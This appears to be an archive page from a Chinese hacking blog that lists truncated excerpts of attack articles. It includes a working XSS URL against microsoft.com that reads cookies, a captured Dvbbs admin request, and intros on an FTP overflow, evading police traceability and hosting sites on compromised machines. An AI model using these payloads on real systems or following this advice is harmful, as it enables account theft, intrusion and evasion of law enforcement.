分类 ‘技术文章’ 下的日志

XSS microsoft.com

在milw0rm上看到的,测试了一下。

URL:
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search

Tags:

动网img标签所带来的危害

本文已发表于<黑客X档案>杂志第8期..转载请注明版权.
作者BLOG:http://www.ciker.org/

看了上期剑心写的[img]标签乐翻天一文.文中有提及在动网里直接加一个管理员.让我想起了去年12月份的时候动网的一个漏洞.本来打算写出来说明一下的.可一直没时间来整理..这次就当是补充剑心的把.

不知道大家是否知道这样一个漏洞.动网announcements.asp文件存在过滤不严漏洞.导致我们有机可乘.
首先我们以管理员身份登陆.发布公告并用WSockExpert抓包.得到数据如下(为了节省版面.我只选了关键部分)
POST /announcements.asp?action=SaveAnn HTTP/1.1
Referer: http://localhost/announcements.asp?boardid=0&action=AddAnn

username=admin&boardid=0&bgs=&title=dvbug 阅读全文 »

Tags:

CesarFTP 0.99 溢出分析

ps:从师傅那里转来的,昨天OPEN也发了我一套,不过还没来得及发,师傅那里发出来了~全图!
信息来源:帅帅D小D

CesarFTP 0.99 是国外常用的一个FTP软件,前段时间国外的黑客发布了该程序存在溢出漏洞,但是做为一个FTP溢出来说利用价值不大,毕竟服务器不会装这个东西,但是抱着学习的态度,好友OPEN仔细的分析了一下,过程如下:
希望转载的朋友写上出自,算是对作者的尊重:
阅读全文 »

Tags:

互联网没有–天网恢恢 疏而不漏

作者:朽木 /BLOG:www.kaonima.com

这篇文章很早就写了,本来是投到黑防的。编辑说稿子很好,回信给我让我修改稿子把路线偏向“防”,可是思来想去,从纯技术的角度来说。目前国内网络结构是无法“防御”的。所以婉言谢绝了黑防编辑修改文章的事情。发出来大家学习吧。

俗语有云:天网恢恢、疏而不漏!这句话是真的么?现实社会中我不知道。但是在互联网上,这句话在Internet上是很软弱的。读完我这篇文,就可以知道。在网络上触犯现行法律,即便于公安部门立案调查,未必就“落入法网” 注:本文仅做技术研讨,并非讨论如何在犯罪后逃脱法律的惩罚。

首先来认识一下:“网监”也就是公安部门分管网络的部门。他们负责网络监管,如网站和服务器被黑、游戏帐号装备被盗、网络上的各种纠纷、色情`反现政府的内容。都属于网监处理。

我们来假设一个案例:163.com主 阅读全文 »

在肉鸡建立真正完美隐藏的网站

作者:朽木 /www.kaonima.com

前些天注册了一个国际COM域名www.kao5.com,苦于没有空间`也不想去买那种IIS空间,一天给你几百个IIS连接`还不够我做肉鸡转向的。所以通过综合网上公开的各种隐藏IIS站点的方法着一尝试`不过均失败。

据不完全统计`我起码在GOOGLE和百度里为这个隐藏IIS`查了不下于50个关键字。花费在搜索资料上的时间大概都有7个小时左右。因为第一天从零点一直坚持GOOGLE/百度到5点多实在快崩溃了,所以去黑基发了个很挑衅的帖子:“斑竹既然说有问必打,你回答不了怎么办?”不过结果斑竹出来道歉`说他们也找不到办法。

终于说明一个问题、什么时候都得靠自己。于是整理了下猛查搜索引擎得来的资料,终于将所查到的资料进行了综合,而得到完美隐藏IIS站点的方法,我花了大概23个小时才搞定`第1天零晨开始、 到晚上23点搞定才睡。接近24 阅读全文 »

国外的动画教程

师傅那里发的一些国外的动画教程。

XSS 攻击的动画教程:
http://www.xiaod.org/toolss/XSSAVL.rar

PHP 注射动画教程:
http://www.xiaod.org/toolss/PHP-injection.rar

potu周博通-资讯阅读器2.0(26060619)最新漏洞

周博通是目前最流行的免费RSS阅读器之一,界面友好,分类清晰,操作简单.内置新浪网、新华网、天极网、计世网等数百个RSS新闻源,不用打开网页就可第一时间阅读自己喜欢的新闻。

CDATA部件在XML里:

If your text contains a lot of "<" or "&" characters – as program code often does – the XML element can be defined as a CDATA section.
如果文本包含了很多的"<"字符和"&"字符——就象程序代码一样,那么最好把他们都放到CDATA部件中。
everything inside the CDATA section is ignored by the parser.所有在CDATA部件之间的文本都会被解析器忽略。

而potu却自作聪明,把代码转换成了html,然后再从他自带的浏览器中打开。

C:\Program 阅读全文 »

利用HTTP指令进行攻击-Cache篇.pdf

文章作者:Coolc(xfocus 2006.6.7 )
原始连接:http://www.xfocus.net/tools/200606/1166.html

利用HTTP指令进行攻击-Cache篇.pdf